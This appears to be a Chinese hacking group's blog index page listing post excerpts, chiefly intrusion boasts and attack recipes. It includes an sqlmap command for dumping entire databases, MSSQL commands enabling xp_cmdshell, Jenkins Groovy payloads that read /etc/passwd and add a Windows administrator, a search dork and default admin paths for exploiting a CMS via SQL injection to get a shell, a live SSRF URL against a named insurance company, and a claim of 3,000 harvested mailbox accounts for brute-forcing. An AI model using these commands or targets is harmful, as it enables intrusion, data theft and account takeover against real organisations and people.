14x Security Team

国内知名信息安全公司招一人职位：渗透测试工程师（网络安全方向），有意者清投递个人简历到hrbadwork@163.com职位要求：1. 熟悉渗透测试原理，熟练运用各种安全、黑客工具。熟悉Windows、Linux平台的攻击技巧2. 关注最新Web应用、系统的漏洞，并能深入了解漏洞原理3、 熟练使用PHP、Python、Asp、c#、java等任意一门语言，熟悉MSSQL、MySQL、Oracle等常用数据库，需要的时候可以自己写程序解决问题4 有良好的工作心态，愿...

秒杀某视频聊天网站-直桶内网不过这个站我要留着，所以暂时不公布地址通过一个越权漏洞和1个注入漏洞看看金币模式，你就蛋痛了花钱购买金币，这不是吭么我自己给自己账号加了这么多金币，我想可能够了然后注入点，直接用SQLMAP执行-os-cmd命令成功提权，由于在内网，就不深入了...

作者：0x80(来自14X安全团队）XSS一般在平台网页上能够执行相关的JS代码之后，那是触发请求原理而定的那么还有一种就是本地域的XSS了====================================================================本地域，也就是在本地执行XSS条件是参数绕过，比如已经禁止你执行SCRIPT的情况下你怎么访问都是501的，这时候，需要看下本地域复制当前源代码到本地，建立1个HTML写个HTML页面以本地127打开12...

一段SQLMAP命令脱掉整站数据存在的注入点sqlmap.py -u http://127.0.0.1/as.php?id=" -D "要脱的数据库' --dump-all...

 意外得到163,3000个邮箱账号，剩下的就是爆破了...

1433 SA 升权代码碰到SA权限降权的时候需要在SQL查询分析器里，输入EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;即可升权代码...

Jenkins CommonCollectionsprintln "cat etc/passwd".execute().text  需要配合SSH反弹WIN      println "net localgroup administrators xxx/add".execute().text...

某企业CMS管理系统存在通用SQL注入漏洞+GETSHELL             作者：0X80inurl:index.php?ie= 技术支持： 宝鸡市世纪网络技术有限公司默认后台：Adm/governlgn.php 或者  Admin/governlgn.php均存在POST注入进入后台，可设置上传类型，直接GETSHELL，不要做坏事额...

 0x80历届视频教程经典回顾（提供下载）XP系统内网提权下载地址：http://pan.baidu.com/s/1dD3riTz全手工php注射+注入root+hex,mid函数,load_filehttp://pan.baidu.com/s/1jGxaq7Glinux 提权 http://pan.baidu.com/s/1o6I8pLK ;解压密码：80bad实战秒掉某银行http://pan.baidu.com/s/1jGFsZky...

江泰保险经纪股份有限公司某站Weblogic SSRF漏洞可探测内网http://bms.jiangtai.com/uddiexplorer//SearchPublicRegistries.jsp?operator=http://localhost:29001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&...